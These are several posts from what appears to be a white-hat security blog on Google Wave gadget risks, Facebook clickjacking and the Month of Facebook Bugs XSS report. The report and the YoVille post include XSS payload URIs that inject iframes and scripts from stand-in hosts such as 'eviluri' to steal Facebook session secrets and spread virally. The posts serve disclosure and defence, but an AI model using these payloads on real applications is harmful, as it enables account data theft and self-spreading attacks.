Cross-Gadget Security in Google Wave

While examining the behavior of gadgets in Google Wave, I noticed another potential security problem in addition to the ones I’d already listed. Each gadget is loaded in a container iframe with a domain separate from the main page, preventing access to the DOM of the Wave interface itself.

However, I also noticed that the container iframes for all of the gadgets I tested used the same domain. That allows one gadget to access the DOM of another gadget. Pictured below is a test gadget that generates an alert displaying the HTML source of the first gadget in the wave, in this case a Yes/No/Maybe gadget from Google.

A test gadget accessing the DOM of another gadget in Google Wave.

A test gadget accessing the DOM of another gadget in Google Wave.

What’s the danger in this sort of cross-gadget access? Consider that people have already created gadgets for accessing your Facebook and Twitter via gadgets. Granted, most of those gadgets have used iframes which load other sites, and thus cross-domain rules would prevent any data breaches. Also, one Twitter gadget I tried actually loaded using its own container URI instead of the standard Google server. But as developers continue to publish more powerful gadgets, cross-gadget access poses some serious risks for CSRF and data theft.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Google Wave as a Tool for Hacking

Many security researchers are familiar with BeEF, a browser exploitation framework by Wade Alcorn. In short, BeEF is a program that brings together various types of code for taking advantage of known vulnerabilities in web browsers. If a target computer loads a certain bit of code within a web page, that code connects to a server control panel which can then execute certain attacks against the “zombie” machine.

After noting potential security issues with the gadgets in Google Wave, I set about to finally setup a BeEF testbed and see if Google Wave was as capable a platform for malware delivery as I suspected.

Example of a BeEF zombie spawned via Google Wave

Example of a BeEF zombie spawned via Google Wave

The picture above shows the results. I successfully created a Google Wave gadget that creates a new BeEF zombie whenever someone views the wave. This does not allow for the keylogger function of BeEF, but I did send an alert dialog (as shown) and used the Chrome DoS function to crash the browser tab. (I could also detect that the zombie machine had Flash installed – imagine the possibilities of using Flash or PDF exploits in an auto-loaded gadget.)

What’s even more disconcerting is that BeEF can integrate with Metasploit to potentially take over a victim’s machine. I do not currently have Metasploit setup to test using Autopwn, but based on my experiences so far, I’m fairly confident such an attack would succeed.

All of these demonstrations about security and Google Wave point to four general weaknesses in Wave’s current structure:

  1. Allowing scripts and iframes in gadgets with no limits apart from sandboxing
  2. Lack of control over what content or users can be added to a wave
  3. No simple mechanism for verifying gadget sources or features
  4. Automatically loading gadgets when a wave is viewed

Any one of these issues would be cause for concern, but taken together they present such alarming possibilities as a user getting their computer hacked simply by viewing a wave. Whatever may be said about Google Wave’s usefulness, I have to conclude that the product is not ready for prime time until these types of problems are addressed.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Have You Seen the New Facebook Gadget for Google Wave?

wavegadget

The above screenshot shows an actual gadget inside a Wave that I created to demonstrate it. Imagine the possibilities of connecting Facebook with Google Wave. You could post information to your Facebook profile right from within Wave, or connect wave participants to Facebook profiles. If you came across this gadget in a wave you were viewing, wouldn’t you love to at least try it out?

There’s just one problem. The above gadget is fake. Not the screenshot, mind you – if you’re a Google Wave user, you can see the gadget in action by inserting the gadget http://theharmonyguy.com/facebook.xml into a wave. But nothing will happen when you try to connect.

And in this case, truly nothing will happen, since I’ve designed the gadget to be harmless – your login information is not sent anywhere. But I imagine many users would fall prey to such a trick, which could be easily adapted for phishing attacks. Ask yourself honestly, would you have tried to login? More importantly, if you came across such a gadget in a wave, how would you know whether it came from theharmonyguy.com, facebook.com, or a malicious host?

I post all this to raise a broader point than simply “beware of phishing attacks.” I realize that the balance between security and usability is a constant struggle for developers, or at least should be. Yet I’m somewhat concerned by the patterns we are training users to be accustomed to.

Case in point: chromeless gadgets within a wave that provide no indication of source. In some ways I almost feel that Google Wave is recreating the web browser. Browsers are applications that can load any sort of web page. Google Wave is an application that can load all sorts of web pages within waves. Yet many of the features developed for browsers to warn a user of insecure sites or phishing attacks (even as basic as the address bar, which shows the current domain) are not replicated when a user loads a gadget in Wave. Many have described Wave as a reinvention of e-mail. Reinventing a technology can be very beneficial, but let’s not forget lessons learned in the old technology – there’s a reason most e-mail clients don’t allow iframes and JavaScript, for instance.

I’m certainly not the first to raise these concerns; others have previously mentioned the danger of login forms on iGoogle gadgets. Nor am I saying that I don’t want Google Wave to succeed. But if we’re going to reinvent a technology, let’s address some of these basic issues of user expectations and security precautions from the start.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

First Impressions on Security in Google Wave

Nearly two years ago, many technology sites brimmed with hype over a new Google technology called OpenSocial. Bloggers questioned if OpenSocial would spell the end of Facebook. Amid all the discussion, I felt that many people were ignoring several serious issues regarding how OpenSocial would handle user data, privacy, and security. A few people brought up questions on this topic, but until an actual implementation hit the market, no one seemed completely sure how OpenSocial would work in practice.

When I heard that Plaxo had brought an OpenSocial framework online, I decided to check out its security for myself. That led to the first hack of an OpenSocial application, and my white-hat hacking hobby began. Admittedly, the “hack” came from poor coding practices on RockYou’s part, but highlighted the need for better authentication in OpenSocial, a problem corrected in later revisions. Still, the event was an inspiration, and led me to continue investigating my previous hacks of Facebook applications, which led to the more serious issues in this year’s FAXX hacks.

Memories of two years ago came back to mind yesterday when I received a Google Wave invite from a friend. Wave has received its share of hype, despite not being publicly available, though lately it’s drawn increasing criticism. Yet I’ve not seen many people explore the security or privacy implications of using the new platform. I decided to take advantage of the invite and start hacking Wave.

What I find was rather surprising, though not entirely unexpected. I’ve noticed several issues with the current version that could be exploited or create more serious problems in the future. Some will argue that bugs should be expected in early versions of a new product, and that future upgrades will improve the situation.  However, I would contend that some of the points raised here deal with basic aspects that should have been addressed from the very beginning. I would also add that I think Google overlooked an opportunity to add more social networking components to their system that could allow them to offer a stronger alternative to Facebook.

Anyway, here are a few of the problems with Google Wave I’ve noticed so far that I’ve not seen on several other lists of Wave criticisms:

  • Allowing iframes in waves. Creating a gadget that loads an iframe is a fairly trivial task. The iframe loads within a container iframe that separates it from the DOM for Wave itself. Still, one can load just about any page using such an iframe. This means that any attack requiring a user to load an infected page, such as my original demonstration of a FAXX hack, can be automated, since viewing the wave loads the iframe page. This can also be easily adapted to make POST requests for CSRF attacks.
  • Allowing invisible iframes in waves. Not only can a gadget include an iframe, it can style that iframe to be invisible, either hiding the attack from wave participants or to create a clickjacking attack within the gadget. Basically, while gadgets load in container iframes, they otherwise have free reign to include any HTML a coder desires. Note that allowing iframes could potentially let an attacker include code for finding browser exploits, which can then allow for malware delivery or even taking over a user’s system.
  • Allowing scripts in waves. Once again, the scripts execute in a container iframe, so one cannot simply wreak havoc with the main application DOM. But scripts do open up several possibilities. In fact, I’ve already created a wave that forwards users to a particular page as soon as they view the wave, since the script is loaded automatically when someone views the wave.
  • Allowing dynamic changes to gadgets. Google may argue that this problem is actually a feature. Essentially, a gadget is loaded dynamically from its source every time a wave is loaded. That means someone could insert an innocent-looking gadget into a wave, then the gadget owner could switch the gadget for a malicious one later on. In fact, since gadgets can be hosted anywhere, an included gadget could even be taken offline, taking away from one of Wave’s selling points (better preserving a record of communications).
  • Allowing gadget access to participant information. Currently, a gadget can only access basic identifying information about who participates in a wave and who is viewing the wave when the gadget loads. However, one can already note several indications that Google will likely expand this functionality to resemble a more complete OpenSocial implementation. As with Facebook applications, allowing such unfettered access for any gadget on initialization raises a number of concerns.
  • Not allowing users to be removed from a wave. I realize that since waves are shared among participants, removing users raises questions of who in the wave is authorized to make such decisions. Still, I find it a glaring oversight that the product includes no mechanism for removing a user whatsoever, especially considering that anyone can join a public wave.
  • Allowing users to add anyone to a wave without approval. If I know the Google account you use for Wave, I can add you as a contact and add you to a wave, which will then appear in your inbox. This all happens without any action on your part. And if I include a malicious gadget, you will load that gadget as soon as you click on the new wave to find out what it’s about.

Once again, many will argue that Google will eventually address these problems, and I certainly hope they do. But I find such oversights of basic security issues rather disconcerting. And while sites such as iGoogle have included “gadgets” with scripts for some time, Wave adds a new dimension in that such gadgets can be loaded with hardly any user interaction or approval.

One possible solution that people will raise is that Google can shut down accounts of known attackers or spammers, ensuring that each Wave user corresponds to a real person who will abide by certain rules, as Facebook has sought to do. But doesn’t this turn Google Wave into exactly the same kind of closed garden which Facebook’s critics have lambasted so often? Yet if Google is not the gatekeeper and opens up the system to users with Google accounts, what has Wave done to address spam and malicious attacks? In fact, as expounded above, if Wave is open to anyone, it provides a powerful new means for delivering malware and exploiting vulnerable users.

Again, I realize that Wave will probably include more privacy controls, such as who can add you to a wave without your permission. But if Google is not building such controls into the product to start with, how effective will they be when they do finally appear?

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

The Dangers of Clickjacking with Facebook

Clickjacking is an admittedly difficult problem to solve entirely, though I question why invisible iframes are necessary. Still, a few techniques to combat the attack exist, such as frame-busting scripts. Twitter implemented this approach after a proof-of-concept attack circulated earlier this year, at the time, several researchers speculated on the ramifications for other sites, such as Facebook.

I’ve noted previously that authorizing a Facebook application requires only a single click, even if you’ve exempted your profile from the Facebook Platform. After noticing another possible clickjacking attack vector, I began compiling a list of single-click actions that should give any Facebook user pause. All of the following actions can be mistakenly performed by a user simply clicking a link or button on an innocent-looking page via clickjacking:

  • Authorize a malicious application. This can happen regardless of any privacy settings. On authorization, an application can immediately access your profile information, your photos, your posted links, your notes, your status updates, etc. It can also send notifications to your profile, send notifications to other people (anonymously or from you), and post feed stories to your wall, all with links included. Note that under default privacy settings, an application can access most of your data if a friend of yours falls prey to this type of attack.
  • Authorize a legitimate application with a cross-site scripting exploit. Most applications vulnerable to such an attack allow for clickjacking installs, where a single click authorizes the application and then forwards a user to an infected application page. That landing page can then execute any of the actions listed above for a malicious application. Note that if a friend falls for this attack and you have authorized the application, all of your data is vulnerable as well.
  • Post a link to your profile. This is possible by applying clickjacking to several Facebook pages used for sharing content. A custom title and description can be set for the link. Other content, such as a Flash video, can also be posted this way.
  • Publish a feed story from a malicious application. Note that this can work regardless of whether you have authorized the application. Applications may publish feed stories prior without authorization by a single click, though this does not grant them access to a user’s data. The feed story may include images, descriptive text, and links. The application can also pre-populate the user’s comments on the story, which would then be submitted upon execution of the clickjacking attack.
  • Send a message to another user. The recipient, subject, and message content, including links, can all be pre-populated. This no longer gives the recipient more access to data than usual, but could still be easily used to spread malware.
  • Send a friend request to another user. This means that a victim could unknowingly send a friend request to a malicious attacker’s profile, and the attacker would simply need to approve the request to gain access to everything on a user’s profile that their friends can access by default.
  • Harvest a user’s post_form_id. Those familiar with Facebook’s code will realize how serious this issue is. However, exploiting a post_form_id also requires knowing a user’s Facebook ID, and so far this attack does not provide the latter.

This list is not simply theoretical – I did some simple testing to make sure that each of these attacks worked. I also would not pretend that my list is exhaustive, and I would welcome any additions from other researchers.

Most of these are already known or fairly trivial to figure out. I am not aware of anyone reporting my method for the last attack, however, and I will be reporting the details of it to Facebook, as I believe it involves a code issue that can be patched apart from any clickjacking protection. Update: Facebook pushed a fix last night which I’ve confirmed. The hole came from a dialog page that one could load via a POST request. Outside its normal context, clicking the submit button on the page would forward a user back to the referring page but with the post_form_id appended.

I hope this list will help raise awareness of the potential dangers of clickjacking. Creating a Facebook version of Twitter’s “don’t click” worm would be fairly simple, and as this list indicates, one could do far more than simply post a link in the process.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

The Month of Facebook Bugs Report

Introduction

The Month of Facebook Bugs, or FAXX Hacks, is a series of reports on vulnerabilities in Facebook applications. The series was a volunteer research project coordinated by an anonymous blogger known as theharmonyguy. All of the vulnerabilities were reported to Facebook and/or relevant application developers prior to their publication.

While one could take several approaches in enumerating “Facebook bugs,” this particular series focused on cross-site scripting holes in Facebook applications. The name FAXX refers to Facebook Application XSS+XSRF, as nearly any XSS vulnerability in a Facebook application allows a sort of cross-site request forgery in that one can use application credentials to make requests to the Facebook API. This is demonstrated in code examples below.

The series helps to quantify the sore lack of application security on the Facebook Platform, a fact perhaps well-known to those in the security community, but not to many others. Furthermore, anecdotal evidence suggests many Facebook users fail to understand distinctions between Facebook and third-party applications, much less the implications of issues with the current Facebook Platform, such as the level of access to user data brought by authorizing an application. Cross-site scripting vulnerabilities are significant on any web site, but when combined with a user’s trust in Facebook and access to the Facebook API, they become even more dangerous.

Summary of Findings

  • Many Facebook applications, even widely used ones or seemingly trustworthy ones, lack basic security precautions.
  • Specifically, cross-site scripting vulnerabilities were found in a wide range of Facebook applications.
  • Each such vulnerability can be exploited to execute malicious JavaScript, such as malware delivery.
  • In addition, such holes allow an attacker to access profile information, including personal details, status updates, and photos, of a victimized user and their friends.
  • Moreover, these vulnerabilities can be used to send notifications or post feed stories, allowing for viral distribution.
  • While each application hole affects users who have already authorized the application, clickjacking can often target users who have not.
  • The series focused on vulnerabilities in legitimate applications, but rogue applications, which could easily exploit clickjacking, have also been noted by others.
  • All of the vulnerabilities reported in the series have been patched, but attacks that exploit application holes remain possible.
  • Preventing future problems due to application vulnerabilities requires action from both application developers and Facebook.

Statistics

  • The series demonstrated vulnerabilities affecting over 9,700 Facebook applications.
  • Over half of the vulnerabilities affected applications that had passed the Facebook Verified Application program.
  • Six of the hacked applications ranked among the top ten by monthly active users at publication.
  • The published monthly active user counts for hacked applications total to more than 218 million.
  • While the previous figure includes overlaps, each vulnerability affected any user who had authorized the application, whether currently active or not.
  • Nearly two-thirds of the vulnerabilities in the first half of the series allowed for clickjacking attacks that would affect any Facebook user. (Applications in the second half of the series were not checked for clickjacking due simply to time constraints.)
  • Vulnerabilities in popular applications that allow for clickjacking mean nearly any Facebook user could fall prey to a FAXX hack.
  • Seven of the current top ten application developers by combined monthly active users had at least one vulnerable application.
  • Nine of the developers contacted took over a week to build a patch for an application vulnerability.

Responsiveness

Many application developers were very responsive, expressed that application security was a priority, and appreciated notification of the vulnerabilities. I certainly recognize that it’s much easier to point out holes in someone else’s work than to spend the effort required to build a large-scale application. I applaud the efforts of hard-working developers who understand the seriousness of these problems and who take application security seriously.

That said, several developers took a while to respond to either me or Facebook. One vulnerability was not patched until more than two weeks after first being reported. I realize that patches take time, but this particular hole should have been a fairly simple fix.

I was also a bit disappointed by some of Facebook’s responses. Don’t get me wrong—I’m very grateful for the security contact who got in touch with me early on. He patiently fielded dozens of e-mails about application issues, and I thank him greatly for his efforts. But as I sent reports of discovered holes to Facebook, the Platform Policy Team would then notify the developer. (I also made a point of looking for e-mail addresses for developers, and always contacted them directly if I found any addresses.) On two occasions, I received a copy of the message that Facebook sent the developer. Here is the body of one of them:

To the developer of application ID#XXXXXXXX,

We’re writing to inform you that your application, [Application Name], has been reported to contain a cross-site scripting vulnerability. Specifically, the [URI parameter] parameter of the [page name] page can accept FBML or HTML that can load in other pages via an iframe.

Please contact theharmonyguy@gmail.com for more information, and let us know when this issue has been resolved.

Thank you in advance,

[Name]

Platform Policy Team

Facebook

As you can imagine, several developers who contacted me thought I was associated with Facebook. I would also note that the information I sent to Facebook included an example URI demonstrating the hole. After seeing the above e-mail, I mentioned the terseness of it to my security contact and requested Facebook communicate more with affected developers. I didn’t see any of the reports later in the month, but hopefully they were more helpful.

Lessons for Developers

  • Sanitize all inputs. That includes every bit of data processed by the application, whether loaded from a Facebook user’s profile, loaded from a database, submitted with a form, or received from the query string of an address. Never assume that a given parameter will be clean or of the expected type.
  • Sanitize all outputs. When displaying a notice or error message, load predetermined strings instead of using dynamic inputs. Never reuse the address of a page without fitering it for injection attempts. Filter any information you output to an application page or via an AJAX interface.
  • Avoid user-generated HTML. Generally, users should never be allowed to input HTML, FBML, or other rich-text formats. When allowing rich-text data, use pre-built, tested code for processing and displaying it, rathering than trying to create your own filters.
  • Check every page. Many vulnerabilities appear in secondary pages, such as ad loaders or AJAX interfaces. Verify security precautions in every part of the application. If possible, consider storing secondary files in a folder other than that of the application’s canvas pages.
  • Verify Facebook sessions. Never rely on a cookie, a query string, or data generated within the application to verify the current user. Facebook provides applications with session information they can always check before making requests or loading information.
  • Use server whitelisting. If your application does not use AJAX or does not otherwise make requests using the Facebook JavaScript API, take advantage of the server whitelist feature in the application properties and only allow requests from your server.
  • Understand third-party code. Take the time to examine any code given to you by other developers, such as JavaScript tools or advertising network receiver files, before including them in your application. In particular, third-party code that arnesses a user’s session secret violates rules given by Facebook.
  • Don’t simply obfuscate. Never rely on JavaScript obfuscation or compression to hide vulnerabilities in application pages. Such techniques may slow down an attacker for a short while, but they can always be worked around or reversed.
  • Educate your users. Avoid incorporating design patterns that train users to accept bad practices, such as entering third-party passwords. Communicate clearly your policies on privacy, data retention, and information security.

Lessons for Facebook

  • Stop the charade. Nearly all instances of user information and content are essentially public. Many users have an understanding of privacy and control not reflected by the findings of this series and others. Either take necessary action to address these issues, or drop illusory privacy controls.
  • Talk to developers. Several resources exist for helping developers get started on the Platform, but Facebook has published much less content reminding developers of security precautions. If you associate your brand with third-party code, you have a reponsibility to help ensure the safety of that code.
  • Truly verify applications. The current Verified Applications program apparently does not address basic security flaws. Also, while opening the floodgates to any application has benefits, it also poses serious risks that may justify putting a few limits or checks in place.
  • Limit application access. While it’s encouraging to hear that Facebook will be adding granular access controls in response to the Canadian Privacy Commissioner, it’s disheartening that such steps took so long and are still nearly a year off from full implementation.
  • Take clickjacking seriously. This series has only begun to demonstrate the implications of clickjacking. Single-click authorization of applications, even when one exempts from the Platform, only adds to the danger of clickjacking on Facebook pages.
  • Improve request verification. The Facebook JavaScript API may provide much useful functionality, but it also opens the door to simple API requests with merely a session secret. Other means exist for ensuring that requests come legitimately from an application instead of an attacker.
  • Distinguish your brand. With the current Facebook Platform, any vulnerability in a third-party application becomes a vulnerability for Facebook. Either users should be able to trust applications to the same degree as Facebook, or Facebook should more clearly distinguish third-party content.
  • Educate your users. People click applications without a second thought to the risks of rogue applications or possible security problems. Users may seek to share personal information with friends, but fail to realize how that information is used by third-party code.

Anatomy of an Attack

I now present a more detailed explanation of how FAXX hacks allow for viral attacks and stealing user information, along with code samples.

Suppose the imaginary Facebook application “Faceplant” includes a parameter “ref” on its home page, i.e. http://apps.facebook.com/faceplant/?ref=install. Further suppose that one of the links within the home page’s code appended the given ref parameter to the “href” attribute, i.e. <a href=”http://apps.facebook.com/faceplant/play?ref=install”>. Finally, suppose the application did not filter the “ref” parameter at all, e.g. the PHP code echo ‘<a href=”http://apps.facebook.com/faceplant/play?ref=’.$ref.’”>’;.

As you can probably see, the “ref” parameter introduces a cross-site scripting hole. For instance, loading the page http://apps.facebook.com/faceplant/?ref=”><img> would render an image element when the page loads. Assuming Faceplant is an FBML application, one could load a URI similar to http://apps.facebook.com/faceplant/?ref=”><fb:iframe src=http://eviluri/> to render a given iframe within the page. (Note that these URIs would need further encoding to actually function properly.) Since the source attribute for the iframe is arbitrary, one could load a page that executes malicious scripts, such as malware delivery or browser exploitation.

So far, we’ve simply described a standard XSS hole. But in a Facebook application, adding an fb:iframe does not simply load a standard iframe. The URI of the iframe page is appended with a series of session parameters, such as the current user’s Facebook ID and the current application’s API key. To make a request to the Facebook API, however, requires the session secret, or the fb_sig_ss parameter. But this parameter is only added to an iframe if the URI originates from the same path as the application itself. Thus in the example above, http://eviluri/ would not have access to the session secret.

In a non-FBML application, one can simply insert JavaScript which checks the page’s parameters, since the application canvas page will have the session secret. For an FBML application, things get a bit trickier – inserted JavaScript gets filtered as FBJS and may not allow for a reliable attack. However, buried in the source code of every FBML application page on apps.facebook.com is the JavaScript variable “source_url,” which gives the direct URI of the application that Facebook loads the FBML from. Accessing this URI directly with valid session parameters appended will load the FBML source into your web browser. While a browser won’t understand all the FBML, it will still load HTML elements as HTML – including script elements.

This brings what I refer to as a double-injection trick. If you find an XSS hole in a page on apps.facebook.com, you’ve actually found an XSS hole in the original FBML page that Facebook loads. Thus you can apply the same XSS hole to the original page. The trick works like this: use the XSS hole in the apps.facebook.com URI to insert an fb:iframe that references the original page’s URI. Since this page is hosted on the same path as the application, it will receive the session secret. For example, http://apps.facebook.com/faceplant/?ref=”><fb:iframe src=http://faceplantapp/index.php>. Now, use the XSS hole a second time by setting the URI of the inserted fb:iframe to insert JavaScript into the direct application page, that is, http://apps.facebook.com/faceplant/?ref=”><fb:iframe src=’http://faceplantapp/index.php?ref=”><script src=http://evilscript/>’>. (Once again, this would have to be encoded properly, but I leave these examples unencoded to make the process more readily clear.) The JavaScript can simply check the URI of the page that loads it to access the session secret.

But even this method does not always work. If the direct application page includes script before the inserted code, it may fail to execute in the absence of Facebook’s processing, and thus the inserted code will not load. We can thus use another trick to get the session secret. Instead of inserting JavaScript directly, insert yet another iframe, as in http://apps.facebook.com/faceplant/?ref=”><fb:iframe src=’http://faceplantapp/index.php?ref=”><iframe src=http://eviluri/>’>. Now note that this second iframe is loaded by the application page, which has received the session secret from the fb:iframe. Hence, the referrer for the second iframe will include the session secret. The page at http://eviluri/ can simply load JavaScript that checks the referrer and grabs the session secret. This code can then make any Facebook API request that the application itself is authorized to make under a user’s session.

For more details on how this would work, download viraluri.txt and eviluri.txt. These are two text files with HTML source code for two files to be used in an attack on Flixster (Movies), utilizing the hole previously reported in that application (and now fixed). The first file uses clickjacking and an invisible iframe to load an apps.facebook.com URI which inserts http://eviluri/ as above. The second file represents the code that one would host at http://eviluri/ to then steal user information, post a link to http://viraluri/ (the address at which the first file would be hosted) on the user’s profile, and send a notification to a given user with a link to http://viraluri/ as well. Finally, the code forwards the user to http://innocenturi/ to avoid any suspicion.

Wrapping Up

I could say so much more about this series and all it involved, but I feel the need to bring this report to a close. I may post additional observations later on. I also want to add that I do not want to come across too harshly towards application developers or Facebook – I recognize steps they have taken to help and protect users in many ways. I can attest from experience that Facebook generally produces very secure code, for instance. But at the same time, I still see much more that could be done, especially considering the wide range of personal information that users share on Facebook compared to other sites.

Regardless, this series provides quantifiable demonstrations of the state of application security on the Facebook Platform, and the results are far from encouraging. I hope it will spark further dialogue about Facebook applications and social networking security in general.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Even More Facebook Bugs

Facebook allows applications to request “extended permissions” – the ability to perform actions not normally allowed for applications, such as updating a user’s status or adding photos to their profile. In the past, these were limited and not used all that often, but more recently several applications have been adding novel uses that require extended permissions.

Once I finished up with the Month of Facebook Bugs project (the full report is coming along and should be posted today or tomorrow), one item on my to-do list was checking how granting extended permissions worked in practice. I’ve noticed cases before where an application would request one extended permission and be granted several.

But this morning, I noticed a friend’s status was a message about taking a quiz (an application built using Quiztacular), along with a link. Since this wasn’t the usual feed story, I checked out the application myself, and sure enough it updated my status – without ever requesting extended permissions.

Further investigation revealed that it had been granted the following extended permissions anyway: Status Update, Add Photos, Add Videos, Create Notes, Share, Stories, and Publish to Streams. I then tried installing several other new applications, and each time I authorized one, it would then automatically appear under each of these seven extended permissions. (You can check which applications have extended permissions here.)

I first noticed this issue a little over an hour ago, and sent an e-mail to my contact at Facebook after confirming the issue. I just did another check and the bug is still present.

While investigating that bug this morning, I also came across another surprising aspect of the Facebook Platform. I visited one application page that did not require authorization when first loaded. (Note that this is not unusual – if an application page does not request any user information, it can load as if it were a normal web page.) The page then brought up a typical Facebook pop-up requesting to post a story on my wall about the reward I’d been granted. Intrigued, I clicked “Publish,” and was then forwarded to a page requesting I authorize the application so I could use my reward in actual gameplay.

I checked my profile before authorizing the application, and to my shock, the feed story sat at the top of my wall, complete with pictures and links. At first this may not appear to be a problem, as the application did not gain access to any of my information and I had to give my approval to post the story. But those familiar with previous posts on this blog will recognize the danger of clickjacking. One could easily build a rogue application page that requests a feed story, load it in an invisible iframe, and with one click users would publish a story that could easily include malicious links.

I trust that Facebook will patch the extended permissions bug (which brings back memories of #Twitbook) quickly, and I would hope that they would address the serious danger of the story publishing setup. But I’m not holding my breath on the latter, given Facebook’s track record with this sort of issue. (And on that note, why did the blogosphere take Twitter to task over clickjacking, but has yet to notice Facebook’s complete lack of clickjacking protection?)

Update (Oct. 8): I got word about three hours ago from Facebook that a fix was being pushed for the first issue posted here (the extended permissions bug). I just checked and can confirm the patch: Applications no longer receive extended permissions on authorization, and the applications that had been mistakenly authorized no longer have those permissions. Good work, Facebook.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: YoVille

We’ve come to the end in the Month of Facebook Bugs – today’s post marks the last published FAXX Hack for September. The series began with a vulnerability in the no. 1 Facebook application, FarmVille from Zynga. Today we end with a very similar hole in another major Zynga application, discovered about two weeks ago.

I have much to cover in recapping this month, and it will likely take a few days to put everything together. I plan on posting a full report that includes statistics and more detailed explanations on how some of these hacks work. Also, as promised, I intend to post demonstration code showing how these holes can be exploited to access user information and spread virally, in addition to standard XSS issues, such as delivering malware.

Thanks for your interest in the Month of Facebook Bugs, and please stay tuned for the upcoming final report.

Facebook Verified Application

Current Monthly Active Users: 17,944,265

Current Rank on Application Leaderboard: 9

Application Developer: Zynga

Responsiveness: Zynga has been one of the most responsive developers I contacted. They replied back quickly and patched the hole soon after.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 5 6 7 8 9 15